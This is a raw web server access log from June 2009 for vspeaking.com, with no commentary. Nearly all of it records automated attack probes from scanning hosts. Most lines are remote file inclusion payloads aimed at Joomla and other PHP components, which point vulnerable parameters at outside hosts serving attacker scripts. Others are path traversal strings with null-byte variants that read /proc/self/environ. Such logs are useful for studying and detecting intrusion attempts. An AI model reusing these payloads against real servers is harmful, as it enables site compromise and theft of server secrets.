70.86.9.234 - - [29/Jun/2009:02:28:27 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:28:48 -0700] "GET /logs/access.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:28:57 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:29:20 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:30:02 -0700] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:02:30:12 -0700] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
91.198.32.3 - - [29/Jun/2009:02:38:07 -0700] "GET /logs/access.log/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.198.32.3 - - [29/Jun/2009:02:38:07 -0700] "GET /logs/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
91.198.32.3 - - [29/Jun/2009:02:38:07 -0700] "GET /!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
66.197.183.69 - - [29/Jun/2009:02:38:40 -0700] "GET /logs/access_090105.log//usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:39:18 -0700] "GET /logs/access.log%20%20/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:39:18 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:39:18 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:40:22 -0700] "GET /logs/access_090413.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:40:22 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:40:22 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:41:11 -0700] "GET /logs/access.log/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:41:11 -0700] "GET /!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
83.98.209.71 - - [29/Jun/2009:02:41:11 -0700] "GET /logs/!rfihttp://info.glandeves.fr//xoops_lib/modules/protector/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:43:42 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:43:42 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:43:42 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:44:53 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:44:53 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:02:44:53 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:44:53 -0700] "GET /?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:44:53 -0700] "GET /logs/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:44:53 -0700] "GET /logs/access.log/?sourcedir=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:50:40 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:50:40 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:50:40 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:11 -0700] "GET /logs/access.log/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:12 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:12 -0700] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:15 -0700] "GET /logs/access.log/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:15 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:56:15 -0700] "GET /logs/?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.810" "vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:57:06 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:57:06 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:57:11 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
199.120.90.222 - - [29/Jun/2009:02:57:46 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://aboutav.com//id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:48 -0700] "GET /logs/access.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:48 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:48 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:51 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:51 -0700] "GET /logs/access.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:02:57:51 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
84.201.208.50 - - [29/Jun/2009:02:59:57 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:02:59:57 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:02:59:57 -0700] "GET /logs/access.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
84.201.208.50 - - [29/Jun/2009:03:00:24 -0700] "GET /logs/access.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.dracocafe.pl/sklep/components/com_sef/1.r? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
211.189.18.73 - - [29/Jun/2009:03:02:16 -0700] "GET /logs/access.log%20%20/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "vspeaking.com"
211.189.18.73 - - [29/Jun/2009:03:02:16 -0700] "GET /logs/?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 2368 "-" "Mozilla/5.0" "vspeaking.com"
211.189.18.73 - - [29/Jun/2009:03:02:16 -0700] "GET /?_zb_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 200 779 "-" "Mozilla/5.0" "vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:03:25 -0700] "GET /logs/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:03:28 -0700] "GET /logs/access_090413.log/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:03:28 -0700] "GET /?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /logs/access.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:03:04:00 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:04:30 -0700] "GET /?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:04:30 -0700] "GET /logs/access_090413.log/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:04:31 -0700] "GET /logs/?sourcedir=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 2368 "-" "libwww-perl/5.805" "www.vspeaking.com"
216.246.98.115 - - [29/Jun/2009:03:04:31 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "vspeaking.com"
216.246.98.115 - - [29/Jun/2009:03:04:32 -0700] "GET /?sourcedir=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
207.210.89.18 - - [29/Jun/2009:03:06:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
86.39.131.85 - - [29/Jun/2009:03:08:18 -0700] "GET /logs/access_090413.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:57 -0700] "GET /logs//facileforms.frame.php?ff_compath=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:57 -0700] "GET /facileforms.frame.php?ff_compath=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:58 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:58 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:58 -0700] "GET /logs//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:58 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:58 -0700] "GET /facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
219.94.194.231 - - [29/Jun/2009:03:10:59 -0700] "GET /logs//facileforms.frame.php?ff_compath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
208.80.195.28 - - [29/Jun/2009:03:11:44 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; IEMB3; IEMB3)" "vspeaking.com"
209.151.224.247 - - [29/Jun/2009:03:12:59 -0700] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.151.224.247 - - [29/Jun/2009:03:12:59 -0700] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.151.224.247 - - [29/Jun/2009:03:12:59 -0700] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
209.151.224.247 - - [29/Jun/2009:03:15:46 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:16:13 -0700] "GET /logs/?sIncPath=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 2225 "-" "libwww-perl/5.805" "www.vspeaking.com"
121.165.73.157 - - [29/Jun/2009:03:16:13 -0700] "GET /?sIncPath=http://saglikmuzesi.trakya.edu.tr/components/com_morfeoshow/idi.txt?%0D?? HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:01 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:01 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:01 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:08 -0700] "GET /logs/access.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:08 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:17:08 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:13 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:13 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:13 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:13 -0700] "GET /logs/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /logs/access.log/errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /errors.php?error=http://www.natalie-coughlin.com/fan/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /logs/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
89.191.11.195 - - [29/Jun/2009:03:17:14 -0700] "GET /logs/access.log/administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.vspeaking.com"
209.151.224.247 - - [29/Jun/2009:03:18:17 -0700] "GET /logs/access_090413.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.tadepinga.net/plugins/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:20:34 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
70.86.9.234 - - [29/Jun/2009:03:20:57 -0700] "GET /logs/scripts.log//admin/classes/TplLoad.php?full_path_to_public_program=http://colegiopenacorada.com/xoops_lib/modules/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.vspeaking.com"
